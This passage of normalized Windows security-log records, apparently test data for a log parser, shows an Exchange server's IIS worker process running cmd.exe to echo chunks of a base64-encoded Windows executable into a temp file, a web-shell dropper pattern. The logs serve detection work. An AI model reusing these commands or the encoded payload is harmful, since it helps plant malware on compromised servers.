AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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>>%TEMP%\\\\RsJnf.b64\",\"Name\":\"CommandLine\"},{\"text\":\"S-1-0-0\",\"Name\":\"TargetUserSid\"},{\"text\":\"-\",\"Name\":\"TargetUserName\"},{\"text\":\"-\",\"Name\":\"TargetDomainName\"},{\"text\":\"0x0\",\"Name\":\"TargetLogonId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\"Name\":\"ParentProcessName\"},{\"text\":\"S-1-16-16384\",\"Name\":\"MandatoryLabel\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Operating system", "event_src.fqdn": "exchange.example.com", "event_src.host": "exchange.example.com", "event_src.hostname": "exchange", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4688_A_new_process_has_been_created", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4688", "normalized": true, "object": "process", "object.account.domain": "example", "object.account.id": "S-1-5-18", "object.account.name": "exchange$", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\System32\\cmd.exe\" /c echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAeGg3SgAAAAAAAAAA4AAPAQsBBgAAsAAAAKAAAAAAAABqtgAAABAAAADAAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAGABAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAbMcAAHgAAAAAUAEAyAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAODBAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAADgAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABmqQAAABAAAACwAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA5g8AAADAAAAAEAAAAMAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAFxwAAAA0AAAAEAAAADQAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADIBwAAAFABAAAQAAAAEAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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>>%TEMP%\\RsJnf.b64", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.id": "2276", "object.process.name": "cmd.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "object.process.parent.id": "10384", "object.process.parent.name": "w3wp.exe", "object.process.parent.path": "c:\\windows\\system32\\inetsrv\\", "object.process.path": "c:\\windows\\system32\\", "recv_ipv4": "127.0.0.1", "recv_time": "2023-04-03T10:05:03.447Z", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-18", "subject.account.name": "exchange$", "subject.account.privileges": "TokenElevationTypeDefault", "subject.account.session_id": "999", "subject.state": "on behalf of oneself", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-03-29T12:26:08.946Z", "type": "raw", "uuid": "e705d12e-8f81-4e5a-a134-6aaeb565d06c"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4688\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"13312\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-03-29T12:26:10.050853400Z\"},\"EventRecordID\":\"8695764\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"23252\"},\"Channel\":\"Security\",\"Computer\":\"exchange.example.com\",\"Security\":null},\"EventData\":{\"Data\":[{\"text\":\"S-1-5-18\",\"Name\":\"SubjectUserSid\"},{\"text\":\"EXCHANGE$\",\"Name\":\"SubjectUserName\"},{\"text\":\"example\",\"Name\":\"SubjectDomainName\"},{\"text\":\"0x3e7\",\"Name\":\"SubjectLogonId\"},{\"text\":\"0x1d64\",\"Name\":\"NewProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"Name\":\"NewProcessName\"},{\"text\":\"%%1936\",\"Name\":\"TokenElevationType\"},{\"text\":\"0x2890\",\"Name\":\"ProcessId\"},{\"text\":\"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\" /c echo 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